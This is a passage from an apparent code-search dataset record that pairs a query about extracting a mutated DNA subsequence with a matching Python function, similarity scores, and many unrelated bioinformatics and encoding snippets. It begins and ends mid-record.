self.run_length_ac)\n return ret", "def to_ascii(self):\n code = self.build()\n for i, line in enumerate(code):\n code[i] = line.replace('1', '|').replace('0', '_')\n return '\\n'.join(code)", "def encode_canonical(pc, vec, ang):\n if len(ang.shape) == 1:\n ang = ang[:, np.newaxis]\n\n theta = np.arctan2(pc[1], pc[0])\n R = get_R(theta) # p_canonical = R * p_world\n vec_cano = R @ vec.T[..., np.newaxis] # (N, 3, 1)\n vec_cano = vec_cano[:, :, 0].T\n ang_cano = ang - theta[:, np.newaxis]\n\n return vec_cano, ang_cano", "def test_encoder(self):\n from sosbeacon.utils import number_encode\n\n number = 123\n encoded = number_encode(number)\n self.assertEqual(encoded, 'b6')", "def icd9toccs(df,col_icd='icd9'):\n ccs9 = load_ccs9()\n output = df.merge(ccs9,how='left',left_on=col_icd,right_on='ICD-9-CM CODE')\n if col_icd!='ICD-9-CM CODE':\n output.drop('ICD-9-CM CODE',axis=1,inplace=True)\n return output", "def encode(self,permutations=True,return_magic=False):\n def compact_encode2(data):\n \"\"\"Encode two columns of integers into a single column.\n\n This is like enmagic2 but results in smaller encoded values, because\n the original values are first replaced by indices into the sets of unique\n values.\n This encoding scheme is therefore usable for repeated application\n on multiple columns.\n\n The return value is the list of codes, the magic value used in encoding,\n and the two sets of uniq values for the columns, needed to restore the\n original data. Decoding can be done with compact_decode2.\n \"\"\"\n # We could use a single compaction vector?\n uniqa, posa = unique(data[:,0], return_inverse=True)\n uniqb, posb = unique(data[:,1], return_inverse=True)\n # We could insert the encoding directly here,\n # or use an encoding function with 2 arguments\n # to avoid the column_stack operation\n rt = column_stack([posa, posb])\n codes, magic = enmagic2(rt)\n return codes,magic,uniqa,uniqb\n \n \n if permutations:\n data = self.copy()\n data.sort(axis=1)\n else:\n data = self\n \n magic = []\n codes = data[:,0]\n for i in range(1,data.shape[1]):\n cols = column_stack([codes,data[:,i]])\n codes,mag,uniqa,uniqb = compact_encode2(cols)\n # insert at the front so we can process in order\n magic.insert(0,(mag,uniqa,uniqb))\n\n if return_magic:\n return codes,magic\n else:\n return codes", "def convert_to_one_letter_code_sing(seq):\n conversion = {\n \"GLY\": \"G\", \"PRO\": \"P\", \"VAL\": \"V\", \"ALA\": \"A\", \"LEU\": \"L\",\n \"ILE\": \"I\", \"MET\": \"M\", \"CYS\": \"C\", \"PHE\": \"F\", \"TYR\": \"Y\",\n \"TRP\": \"W\", \"HIS\": \"H\", \"ARG\": \"R\", \"LYS\": \"K\", \"GLN\": \"Q\",\n \"THR\": \"T\", \"ASP\": \"D\", \"ASN\": \"N\", \"SER\": \"S\", \"GLU\": \"E\"\n }\n n_seq = conversion[seq]\n return n_seq", "def rle_encoder(txt):\n if not txt:\n return ''\n c = txt[0]\n i = 1\n res = []\n for x in txt[1:]:\n if x == c:\n i += 1\n else:\n res.append((c,i))\n i = 1\n c = x\n res.append((c,i))\n return res", "def encode(self, x):\n return [self.vae[c_idx].encode(x[c_idx])\n for c_idx in range(self.n_channels)]", "def encoded(self):\n text, chars = self.chars()\n int2char = dict(enumerate(chars))\n char2int = {ch: ii for ii, ch in int2char.items()}\n encoded = np.array([char2int[ch] for ch in text])\n return encoded", "def one_hot_encoder(self, DNA_string):\n\n if self.selex_predict_str_adaptor != 0:\n DNA_string = \"A\" * self.selex_predict_str_adaptor + DNA_string + 'A' * self.selex_predict_str_adaptor\n\n trantab = DNA_string.maketrans('ACGT', '0123')\n str_arr = [\"\" for x in 
range(self.num_of_str)]\n for i in range(0, self.num_of_str): ##each substring goes to different element array\n str_arr[i] = DNA_string[i: i + self.selex_str_len]\n\n # if the \"ACGT\"\n # won't be added it will be impossible to convert sequnces which miss one of the letters\n str_arr[self.num_of_str - 1] = str_arr[self.num_of_str - 1] + \"ACGT\"\n\n final_str = list(\"\")\n for i in range(0, self.num_of_str):\n final_str += list(str_arr[i].translate(trantab))\n\n return to_categorical(final_str)[0:-4] # returns the matrix without the \"ACGT\"", "def _transform(self, original, coder):\n msg = list(original)\n for k in range(len(msg)):\n if 0x590 < ord(msg[k]) < 0xfb50:\n msg[k] = coder[msg[k]]\n return u\"\".join(msg)", "def compact_encode2(data):\n # We could use a single compaction vector?\n uniqa, posa = unique(data[:,0], return_inverse=True)\n uniqb, posb = unique(data[:,1], return_inverse=True)\n # We could insert the encoding directly here,\n # or use an encoding function with 2 arguments\n # to avoid the column_stack operation\n rt = column_stack([posa, posb])\n codes, magic = enmagic2(rt)\n return codes,magic,uniqa,uniqb" ]
[ "0.65794533", "0.62438995", "0.6232326", "0.62068266", "0.6048946", "0.5984779", "0.5922863", "0.5862185", "0.5761406", "0.57606995", "0.5690487", "0.56302047", "0.5617058", "0.5587301", "0.5558331", "0.5556066", "0.5555711", "0.55398685", "0.54918736", "0.54819953", "0.54703707", "0.5463835", "0.5463755", "0.5463755", "0.5438159", "0.5431525", "0.53654575", "0.5338962", "0.53365326", "0.5331119", "0.5315581", "0.53101516", "0.52976346", "0.524646", "0.52432257", "0.5233494", "0.5229954", "0.5220865", "0.5210746", "0.5186018", "0.51844954", "0.51713896", "0.5171244", "0.5170336", "0.5165672", "0.5159753", "0.51581496", "0.51541126", "0.51530856", "0.5137306", "0.5133604", "0.512666", "0.51228654", "0.5097099", "0.5077731", "0.5072858", "0.507135", "0.5058134", "0.50567347", "0.5055806", "0.5054859", "0.505343", "0.5052755", "0.5052421", "0.50424546", "0.5032052", "0.5031011", "0.50301135", "0.5027652", "0.5018498", "0.50068676", "0.50068676", "0.50068676", "0.50068676", "0.49989948", "0.49905893", "0.49903774", "0.4986125", "0.4979594", "0.4973181", "0.49667266", "0.4954327", "0.4954327", "0.4946451", "0.49455023", "0.4942511", "0.49413335", "0.4937866", "0.49348333", "0.49251735", "0.49181765", "0.4916183", "0.49115476", "0.4907151", "0.49019763", "0.49009752", "0.48976633", "0.48959404", "0.48913354", "0.48910168" ]
0.7192931
0
Get the mutated DNA subsequence according to the mutation specified by the variant_comb.
def get_sub_mut_dna(background_seq, coord, variant_comb, somatic_mutation_sub_dict, strand, gene_start): def _get_variant_pos_offset(variant_pos, coord_pair_list, strand): offset = 0 takes_effect = False for p1,p2 in coord_pair_list: if variant_pos >= p1 and variant_pos < p2: if strand == '+': offset += variant_pos - p1 else: offset += p2 - variant_pos - 1 takes_effect = True break else: offset = p2 - p1 return offset if takes_effect else np.nan real_coord = list(filter(lambda x: x is not np.nan and x != None, coord)) assert len(real_coord) % 2 == 0 coord_pair_list = list(zip(real_coord[::2], real_coord[1::2])) if strand == '+': sub_dna = ''.join([background_seq[pair[0] - gene_start:pair[1] - gene_start] for pair in coord_pair_list]) else: sub_dna = ''.join([background_seq[pair[0] - gene_start:pair[1] - gene_start][::-1] for pair in coord_pair_list]) if variant_comb is np.nan : # no mutation exist return sub_dna relative_variant_pos = [_get_variant_pos_offset(variant_ipos, coord_pair_list, strand) for variant_ipos in variant_comb] for i,variant_ipos in enumerate(variant_comb): mut_base = somatic_mutation_sub_dict[variant_ipos]['mut_base'] ref_base = somatic_mutation_sub_dict[variant_ipos]['ref_base'] pos = relative_variant_pos[i] if pos is not np.nan: sub_dna = sub_dna[:pos] + mut_base + sub_dna[pos+1:] return sub_dna
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_DNA_seq(mutant_position, all_lines):\n\n dna_lines = []\n for i in range(mutant_position + 2, len(all_lines)):\n line = all_lines[ i ]\n if not line:\n break\n\n line = line.replace(\"Variant sequence: \", \"\")\n dna_lines.append(line)\n return dna_lines", "def select_subsequence(emg):\n # Get locations of each word\n new_word_begins = np.hstack([[0], np.where(emg[\"word\"][1:] != emg[\"word\"][:-1])[0] + 1])\n #print(emg[\"word\"][new_word_begins])\n \n full_transcript = \" \".join(emg[\"word\"][new_word_begins]).replace(\"$\", \"\").strip()\n if len(new_word_begins) <= 3:\n return emg, full_transcript \n \n # Select a random subsequence -- at least length 1, or at least length 2 if $ at end/begin\n # is included, and guaranteed that begin comes before end\n end_word, start_word = -1, -1\n while (end_word <= start_word or \n end_word-start_word < 2 or \n end_word-start_word < 3 and (start_word == 0 or end_word == len(new_word_begins)-1)):\n start_word = np.random.randint(max(1, len(new_word_begins)-2))\n end_word = np.random.randint(start_word+1, len(new_word_begins))\n \n start_loc = new_word_begins[start_word]\n end_loc = new_word_begins[end_word]\n \n new_transcript = \" \".join(emg[\"word\"][new_word_begins][start_word:end_word]).replace(\"$\", \"\").strip()\n new_emg = emg[start_loc:end_loc]\n \n if len(new_emg) == 0:\n return emg, full_transcript\n else:\n return new_emg, new_transcript", "def count_variant(self, variant_dna, include_indels=True):\n if not re.match(\"^[ACGTNXacgtnx]+$\", variant_dna):\n raise ValueError(\n \"Variant DNA sequence contains unexpected \"\n \"characters [{}]\".format(self.name)\n )\n\n variant_dna = variant_dna.upper()\n\n if len(variant_dna) != len(self.wt.dna_seq):\n if self.aligner is not None:\n mutations = self.align_variant(variant_dna)\n else:\n return None\n else:\n mutations = list()\n for i in range(len(variant_dna)):\n if variant_dna[i] != self.wt.dna_seq[i]:\n mutations.append(\n (\n i,\n \"{pre}>{post}\".format(\n pre=self.wt.dna_seq[i], post=variant_dna[i]\n ),\n )\n )\n if len(mutations) > self.max_mutations:\n if self.aligner is not None:\n mutations = self.align_variant(variant_dna)\n if len(mutations) > self.max_mutations:\n # too many mutations post-alignment\n return None\n else:\n # stop looping over this variant\n break\n else:\n # too many mutations and not using aligner\n return None\n\n mutation_strings = list()\n if self.is_coding():\n variant_protein = \"\"\n for i in range(0, len(variant_dna), 3):\n try:\n variant_protein += CODON_TABLE[variant_dna[i : i + 3]]\n except KeyError: # garbage codon due to indel, X, or N\n variant_protein += \"?\"\n\n for pos, change in mutations:\n ref_dna_pos = pos + self.wt.dna_offset + 1\n ref_pro_pos = pos // 3 + self.wt.protein_offset + 1\n mut = \"c.{pos}{change}\".format(pos=ref_dna_pos, change=change)\n if has_indel(change):\n mut += \" (p.{pre}{pos}fs)\".format(\n pre=AA_CODES[self.wt.protein_seq[pos // 3]], pos=ref_pro_pos\n )\n elif variant_protein[pos // 3] == self.wt.protein_seq[pos // 3]:\n mut += \" (p.=)\"\n else:\n mut += \" (p.{pre}{pos}{post})\".format(\n pre=AA_CODES[self.wt.protein_seq[pos // 3]],\n pos=ref_pro_pos,\n post=AA_CODES[variant_protein[pos // 3]],\n )\n mutation_strings.append(mut)\n else:\n for pos, change in mutations:\n ref_dna_pos = pos + self.wt.dna_offset + 1\n mut = \"n.{pos}{change}\".format(pos=ref_dna_pos, change=change)\n mutation_strings.append(mut)\n\n if len(mutation_strings) > 0:\n variant_string = \", \".join(mutation_strings)\n else:\n 
variant_string = WILD_TYPE_VARIANT\n return variant_string", "def _get_variant(mut_dat, variant, item, all_except=False):\n assert item in mut_dat[variant].unique(), \"{0} not found, options are: {1}\".format(item, mut_dat[variant].unique())\n\n\n if isinstance(item, collections.Iterable) and not isinstance(item, six.string_types):\n method = lambda x,y: mut_dat.loc[mut_dat[x].isin(y)]\n\n else:\n cases = {True: lambda x, y: mut_dat.loc[~(mut_dat[x] == y)],\n False: lambda x, y: mut_dat.loc[mut_dat[x] == y]}\n method = cases[all_except]\n\n return method(variant, item)", "def get_seq(self):\n \n dna_seq = self.gene.polymer.get_subseq(\n start=self.gene.start, end=self.gene.end, strand=self.gene.strand)\n \n return dna_seq.transcribe()", "def genomic_sub_grch38():\n params = {\n \"id\": \"normalize.variation:NC_000007.13%3Ag.55249071C%3ET\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.1ewlywoD423K7YH_K4YefZg6J_87pQTp\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.1ewlywoD423K7YH_K4YefZg6J_87pQTp\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.0p1nWj9-sryfUD5jvPTZZdnZeiHVHXls\",\n \"interval\": {\n \"end\": {\"value\": 55181378, \"type\": \"Number\"},\n \"start\": {\"value\": 55181377, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"T\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0001483\",\n \"vrs_ref_allele_seq\": \"C\"\n }\n return VariationDescriptor(**params)", "def extract_hgvs_cdna(self, variant_name, clinvar_set_el):\n hgvs_cand = re.sub(r\"\\(\" + \"(BRCA[1|2])\" + r\"\\)\",\n \"\", variant_name.split()[0])\n\n # only take variants starting with NM_ and not containing []\n hgvs_cdna_re = r'NM_.*:[^\\[]*$'\n\n if not re.match(hgvs_cdna_re, hgvs_cand):\n # taking Attribute of 'HGVS', 'HGVS, coding' or 'HGVS, coding, RefSeq' in\n # both ReferenceClinVarAssertion and ClinVarAssertion's\n hgvs_candidates = [ev.text for ev in clinvar_set_el.findall('.//Measure/AttributeSet/Attribute')\n if ev.attrib['Type'].startswith('HGVS, coding') or ev.attrib['Type'] == 'HGVS']\n\n filtered = [s for s in hgvs_candidates if re.match(hgvs_cdna_re, s)]\n if filtered:\n return filtered[0]\n\n return hgvs_cand", "def mutate(self, dna):\n new_dna = []\n for c in range(self.DNA_SIZE):\n if int(random.random()*self.mutation_chance)==1:\n if random.random() >= 0.5:\n new_dna.append(round(dna[c]+self.mutation_factor, 2))\n else:\n new_dna.append(round(dna[c]-self.mutation_factor, 2))\n else:\n new_dna.append(round(dna[c], 2))\n return new_dna", "def get_mutated_sequence(focus_seq, mutant, start_idx=1, AA_vocab=AA_vocab):\n mutated_seq = list(focus_seq)\n for mutation in mutant.split(\":\"):\n try:\n from_AA, position, to_AA = mutation[0], int(mutation[1:-1]), mutation[-1]\n except:\n print(\"Issue with mutant: \"+str(mutation))\n relative_position = position - start_idx\n assert (from_AA==focus_seq[relative_position]), \"Invalid from_AA or mutant position: \"+str(mutation)+\" from_AA: \"+str(from_AA) + \" relative pos: \"+str(relative_position) + \" focus_seq: \"+str(focus_seq)\n assert (to_AA in AA_vocab) , \"Mutant to_AA is invalid: \"+str(mutation)\n mutated_seq[relative_position] = to_AA\n return \"\".join(mutated_seq)", "async def test_coding_dna_and_genomic_substitution(\n test_handler, braf_v600e_nucleotide, genomic_substitution,\n 
genomic_sub_grch38, egfr_grch38_sub, grch38_braf_genom_sub):\n resp = await test_handler.normalize(\"NM_004333.4:c.1799T>A\")\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"NM_004333.4:c.1799T>A\")\n\n # MANE transcript\n refseq_id = \"normalize.variation:NM_004333.4%3Ac.1799T%3EA\"\n\n # TODO: Check if this should return a different VRS object?\n resp = await test_handler.normalize(\"ENST00000288602.10:c.1799T>A\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:ENST00000288602.10%3Ac.1799T%3EA\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"ENST00000288602.10:c.1799T>A\")\n\n resp = await test_handler.normalize(\"BRAF V600E c.1799T>A\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:BRAF%20V600E%20c.1799T%3EA\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF V600E c.1799T>A\")\n\n resp = await test_handler.normalize(\"BRAF V600E (c.1799T>A)\")\n assert resp.variation_descriptor.id == \\\n \"normalize.variation:BRAF%20V600E%20%28c.1799T%3EA%29\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF V600E (c.1799T>A)\")\n\n resp = await test_handler.normalize(\"BRAF c.1799T>A\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20c.1799T%3EA\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide, \"BRAF c.1799T>A\")\n\n resp = await test_handler.normalize(\"NC_000007.13:g.140453136A>T\")\n assertion_checks(resp.variation_descriptor, grch38_braf_genom_sub,\n \"NC_000007.13:g.140453136A>T\")\n\n fixture_id = \"normalize.variation:NC_000007.13%3Ag.140453136A%3ET\"\n resp = await test_handler.normalize(\"7-140453136-A-T\") # 37\n assert resp.variation_descriptor.id == \"normalize.variation:7-140453136-A-T\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, grch38_braf_genom_sub,\n \"7-140453136-A-T\")\n\n resp = await test_handler.normalize(\"7-140753336-A-T\") # 38\n assert resp.variation_descriptor.id == \"normalize.variation:7-140753336-A-T\"\n resp.variation_descriptor.id = fixture_id\n assertion_checks(resp.variation_descriptor, grch38_braf_genom_sub,\n \"7-140753336-A-T\")\n\n resp = await test_handler.normalize(\"BRAF V600E (g.140453136A>T)\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20V600E%20%28g.140453136A%3ET%29\" # noqa: E501\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF V600E (g.140453136A>T)\")\n\n resp = await test_handler.normalize(\"BRAF g.140453136A>T\")\n assert resp.variation_descriptor.id == \"normalize.variation:BRAF%20g.140453136A%3ET\"\n resp.variation_descriptor.id = refseq_id\n assertion_checks(resp.variation_descriptor, braf_v600e_nucleotide,\n \"BRAF g.140453136A>T\")\n\n # More than 1 gene (EGFR and EGFR-AS1)\n resp = await test_handler.normalize(\"NC_000007.13:g.55249071C>T\")\n assertion_checks(resp.variation_descriptor, genomic_sub_grch38,\n \"NC_000007.13:g.55249071C>T\")\n\n resp = await test_handler.normalize(\"EGFR g.55249071C>T\")\n assert resp.variation_descriptor.id == \"normalize.variation:EGFR%20g.55249071C%3ET\"\n resp.variation_descriptor.id = \"normalize.variation:NC_000007.13%3Ag.55249071C%3ET\"\n assertion_checks(resp.variation_descriptor, genomic_substitution,\n 
\"EGFR g.55249071C>T\")", "def generate_mutString(s):\r\n test_seq = Seq.MutableSeq(str(template))\r\n #Introduce the mutation in a test string\r\n for mut in s.split():\r\n pos = int(mut[1:-1]) - 1 #Numbering from 0 in strings \r\n old = mut[0]\r\n new = mut[-1]\r\n if old == test_seq[pos]:\r\n test_seq[pos] = new \r\n else:\r\n print('Initial mutation didnt match')\r\n \r\n return test_seq", "def get_seq(self, table=1, cds=True):\n dna_seq = '' \n for exon in self.transcript.exons: \n dna_seq += self.transcript.rna.gene.polymer.get_subseq(\n start=max(self.coding_region.start, exon.start), \n end=min(self.coding_region.end, exon.end))\n \n if self.transcript.rna.gene.strand == core.PolymerStrand.negative:\n dna_seq = dna_seq.reverse_complement()\n \n return dna_seq.transcribe().translate(table=table, cds=cds)", "def mutate_seq(genome):\n for var in genome.get_variants():\n if var.type == \"snp\":\n mutate_snp(genome, var)\n elif var.type == \"indel\":\n mutate_indel(genome, var)\n elif var.type == \"deletion\":\n mutate_deletion(genome, var)\n elif var.type == \"translocation origin\":\n mutate_trans_orig(genome, var)\n elif var.type == \"translocation insert\":\n mutate_trans_ins(genome, var)", "def get_seq(self):\n dna_seq = ''\n\n for exon in self.exons: \n dna_seq += self.rna.gene.polymer.get_subseq(\n start=exon.start, end=exon.end)\n\n if self.rna.gene.strand==core.PolymerStrand.negative:\n dna_seq = dna_seq.reverse_complement() \n \n return dna_seq.transcribe()", "def protein_variant(variant):\n _validate_str(variant)\n if variant == WILD_TYPE_VARIANT:\n return WILD_TYPE_VARIANT\n elif variant == SYNONYMOUS_VARIANT:\n return SYNONYMOUS_VARIANT\n else:\n matches = re.findall(\"\\((p\\.\\S*)\\)\", variant)\n if len(matches) == 0:\n raise ValueError(\"Invalid coding variant string.\")\n # uniqify and remove synonymous\n seen = {\"p.=\": True}\n unique_matches = list()\n for v in matches:\n if v in seen:\n continue\n else:\n seen[v] = True\n unique_matches.append(v)\n if len(unique_matches) == 0:\n return SYNONYMOUS_VARIANT\n else:\n return \", \".join(unique_matches)", "def genomic_substitution(egfr_context):\n params = {\n \"id\": \"normalize.variation:NC_000007.13%3Ag.55249071C%3ET\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.VkcuqgqMuSQeq8Hy0VPOGRIeyr8uSBV2\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.VkcuqgqMuSQeq8Hy0VPOGRIeyr8uSBV2\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.G1gIZ-om-8Exl3F0ZLxXYY8CjliwCaO1\",\n \"interval\": {\n \"end\": {\"value\": 2630, \"type\": \"Number\"},\n \"start\": {\"value\": 2629, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.d_QsP29RWJi6bac7GOC9cJ9AO7s_HUMN\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"T\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"transcript\",\n \"structural_type\": \"SO:0001483\",\n \"vrs_ref_allele_seq\": \"C\",\n \"gene_context\": egfr_context\n }\n return VariationDescriptor(**params)", "def generate_variant_sequence(seq, variant, start=0, offset=0):\n ref, position, alt = extract_variant_info(variant)\n\n # make sure ref and alt have the same number of characters\n assert len(ref) == len(alt), \"Variants have different length.\"\n\n # calculate position relative to gene ref sequence instead of genome\n relative_start = position - start + offset - 1\n relative_end = relative_start + len(ref)\n\n # change the reference sequence to the alternate seq\n return 
seq[:relative_start] + alt + seq[relative_end:]", "def readMtVariant(variant_file, fam_excl = {}, pos_excl = {}):\n\tdata = {}\n\tn = 0\n\tif (variant_file == \"-\"):\n\t\t#use standard input instead\n\t\tfh = sys.stdin\n\telse:\n\t\tfh = open(variant_file)\n\thead = fh.readline()\n\thead = head.rstrip(\"\\r\\n\").split(\"\\t\")\n\tassert len(head) >= 27, \"Truncated head line of the variant file\"\n\tfor line in fh:\n\t\tline = line.rstrip(\"\\r\\n\").split(\"\\t\")\n\t\tfamily,sample,chr,pos,ref,depth,depth_fwd,depth_rev,allele,A,T,C,G,a,t,c,g,\\\n\t\theteroplasmy,substitution,het_allele,het_freq,het_freq_mle,het_freq_llr,het_low,het_high,het_p_fisher,het_p_sbias = line[:27]\n\t\tif (family in fam_excl):\n\t\t\t#exclude this family\n\t\t\tcontinue\n\t\tif (family == \"family\"):\n\t\t\t#skip the head line\n\t\t\tcontinue\n\t\t#a new variant\n\t\tvariant = MtVariant(family,sample,pos,ref,depth,depth_fwd,depth_rev,allele,het_allele,het_freq_mle,het_freq_llr,het_p_sbias)\n\t\t#temporarily store the original line\n\t\tvariant.line_cache = line[:]\n\t\tif (family not in data):\n\t\t\tdata[family] = {}\n\t\tif (sample not in data[family]):\n\t\t\tdata[family][sample] = {}\n\t\tpos = variant.pos\n\t\tassert pos not in data[family][sample], \"Duplicated vairant at position %d in sample %s.\" % (variant.pos, variant.sample)\n\t\tif (pos in pos_excl):\n\t\t\t#exclude this position\n\t\t\tcontinue\n\t\tdata[family][sample][pos] = variant\n\t\tn += 1\n\tprint \"Read %d mitochondrial DNA variants\" % n\n\treturn head, data", "def __getitem__(self, uuid: UUID) -> Mutant:\n return self.__mutants[uuid]", "def get_activating_subs(self):\n q_mods = prefixes + \"\"\"\n SELECT ?enzyme_name ?sub_label ?act_type ?rel ?stmt ?subject\n WHERE {\n ?stmt a belvoc:Statement .\n ?stmt belvoc:hasRelationship ?rel .\n ?stmt belvoc:hasSubject ?subject .\n ?stmt belvoc:hasObject ?object .\n ?subject a belvoc:ProteinAbundance .\n ?subject belvoc:hasConcept ?enzyme_name .\n ?subject belvoc:hasChild ?sub_expr .\n ?sub_expr rdfs:label ?sub_label .\n ?object a belvoc:AbundanceActivity .\n ?object belvoc:hasActivityType ?act_type .\n ?object belvoc:hasChild ?enzyme .\n ?enzyme a belvoc:ProteinAbundance .\n ?enzyme belvoc:hasConcept ?enzyme_name .\n }\n \"\"\"\n\n # Now make the PySB for the phosphorylation\n res_mods = self.g.query(q_mods)\n\n for stmt in res_mods:\n evidence = self._get_evidence(stmt[4])\n # Parse out the elements of the query\n enz = self._get_agent(stmt[0], stmt[5])\n sub_expr = term_from_uri(stmt[1])\n act_type = term_from_uri(stmt[2]).lower()\n # Parse the WT and substituted residues from the node label.\n # Strangely, the RDF for substituted residue doesn't break the\n # terms of the BEL expression down into their meaning, as happens\n # for modified protein abundances. Instead, the substitution\n # just comes back as a string, e.g., \"sub(V,600,E)\". 
This code\n # parses the arguments back out using a regular expression.\n match = re.match('sub\\(([A-Z]),([0-9]*),([A-Z])\\)', sub_expr)\n if match:\n matches = match.groups()\n wt_residue = matches[0]\n position = matches[1]\n sub_residue = matches[2]\n else:\n logger.warning(\"Could not parse substitution expression %s\" %\n sub_expr)\n continue\n mc = MutCondition(position, wt_residue, sub_residue)\n enz.mutations = [mc]\n rel = strip_statement(stmt[3])\n if rel == 'DirectlyDecreases':\n is_active = False\n else:\n is_active = True\n\n stmt_str = strip_statement(stmt[4])\n # Mark this as a converted statement\n self.converted_direct_stmts.append(stmt_str)\n st = ActiveForm(enz, act_type, is_active, evidence)\n self.statements.append(st)", "def subopt(sequences, energy_gap, ordering = None, material = 'rna',\n dangles = 'some', T = 37, multi = True, pseudo = False,\n sodium = 1.0, magnesium = 0.0, degenerate = False):\n \n ## Set up command-line arguments and input\n args, cmd_input = \\\n setup_nupack_input(exec_name = 'subopt', sequences = sequences, ordering = ordering,\n material = material, sodium = sodium, magnesium = magnesium,\n dangles = dangles, T = T, multi = multi, pseudo = pseudo)\n cmd_input += '\\n' + str(energy_gap)\n \n ## Perform call\n output = call_with_file(args, cmd_input, '.subopt')\n\n ## Parse and return output\n structs = []\n for i, l in enumerate(output):\n if l[0] == '.' or l[0] == '(':\n s = l.strip()\n e = output[i-1].strip()\n structs.append((s,e))\n \n return structs", "def __getitem__(self, idx):\n pos_pid = self.valid_passage_ids[idx]\n psg = self.passage_sent_dict[pos_pid]\n assert(len(psg) > 1)\n\n # randomly select a sentence as the question\n qid = random.choice(range(len(psg)))\n query = psg[qid]\n query_tokens = self.tokenizer.encode(query)\n\n # remove the selected sentence with 1 - sent_keep probability, this psg is the positive psg.\n sent_remove_flag = random.random() > self.sent_keep\n pos_psg = \" \".join(psg[:qid] + psg[qid+sent_remove_flag:])\n postive_psg_tokens = self.tokenizer.encode(pos_psg)\n\n # randomly sample from the rest to get negative samples.\n\n # extract a percentage of hard examples\n hard_k = int(self.sampled_softmax_n * self.hard_negative_rate)\n passage_set = self.passageids_set - set([pos_pid])\n hard_negatives = set([item for item in passage_set if item.split('.')[0] == pos_pid.split('.')[0]])\n\n # handle edge case for \n if len(hard_negatives) >= hard_k:\n npids_hard = random.sample(hard_negatives, k=hard_k)\n else:\n npids_hard = []\n hard_k = 0\n\n # extract a percentage of easy examples\n rest_k = self.sampled_softmax_n - hard_k\n npids_rest = random.sample(self.passageids_set - set([pos_pid]) - set(npids_hard), k=rest_k)\n\n # putting it all together\n npids = npids_hard + npids_rest\n negative_psg_tokens_list = [self.passage_dict[pid] for pid in npids]\n\n return query_tokens, postive_psg_tokens, negative_psg_tokens_list, pos_pid, npids", "def _variants_gen(self, test):\n return self._get_variants_gen(test).gen(test)", "def getMtVariant(data, depth_min = 10, depth_ratio_min = 0.0):\n\tvar = {}\n\tn = 0\n\tfor family in data:\n\t\tvar[family] = {}\n\t\tfor sample in data[family]:\n\t\t\tvar[family][sample] = {}\n\t\t\tfor variant in data[family][sample].values():\n\t\t\t\tif (variant.ref == \"N\"):\n\t\t\t\t\tcontinue\n\t\t\t\tif (variant.depth_qc >= depth_min and variant.depth_ratio >= depth_ratio_min):\n\t\t\t\t\tvar[family][sample][variant.pos] = variant\n\t\t\t\t\tn += 
1\n\t\t\t\telse:\n\t\t\t\t\tvar[family][sample][variant.pos] = None\n\tprint \"Read %d mitochondrial DNA variants\" % n\n\treturn var", "def get_transcript_sgrnas(target_region_seq_df, context_len, pam_start, pam_len,\n sgrna_start, sgrna_len, pams, sg_positions):\n sgrna_df_list = []\n meta_columns = ['object_type', 'strand', 'transcript_id', 'seq_region_name', 'region_id', 'start', 'end']\n for i, row in target_region_seq_df.iterrows():\n seq_start = row['expanded_start']\n seq_end = row['expanded_end']\n sequence = row['seq']\n # Sequences on the positive strand\n pos_sgrna_df = tile.build_sgrna_df(sequence, context_len=context_len, pam_start=pam_start,\n pam_len=pam_len, sgrna_start=sgrna_start,\n sgrna_len=sgrna_len, pams=pams)\n pos_sgrna_df = get_sgrna_global_indices(pos_sgrna_df, seq_start, seq_end, 1, sg_positions)\n # assuming the target_region_seq_df is oriented on the positive sgRNA strand\n pos_sgrna_df['sgrna_strand'] = 1\n # Sequences on the negative strand\n rev_comp_seq = reverse_compliment(sequence)\n neg_sgrna_df = tile.build_sgrna_df(rev_comp_seq, context_len=context_len, pam_start=pam_start,\n pam_len=pam_len, sgrna_start=sgrna_start,\n sgrna_len=sgrna_len, pams=pams)\n neg_sgrna_df = get_sgrna_global_indices(neg_sgrna_df, seq_start, seq_end, -1, sg_positions)\n neg_sgrna_df['sgrna_strand'] = -1\n # Combine and filter sgrna_dfs\n sgrna_df = pd.concat([pos_sgrna_df, neg_sgrna_df])\n for col in meta_columns:\n sgrna_df[col] = row[col]\n sgrna_df_list.append(sgrna_df)\n concatenated_sgrna_dfs = (pd.concat(sgrna_df_list)\n .rename({'strand': 'transcript_strand',\n 'start': 'region_start',\n 'end': 'region_end',\n 'seq_region_name': 'chromosome'}, axis=1))\n return concatenated_sgrna_dfs", "def get_genes(variant):\n genes = {}\n transcripts = []\n mongo_genes = []\n \n # 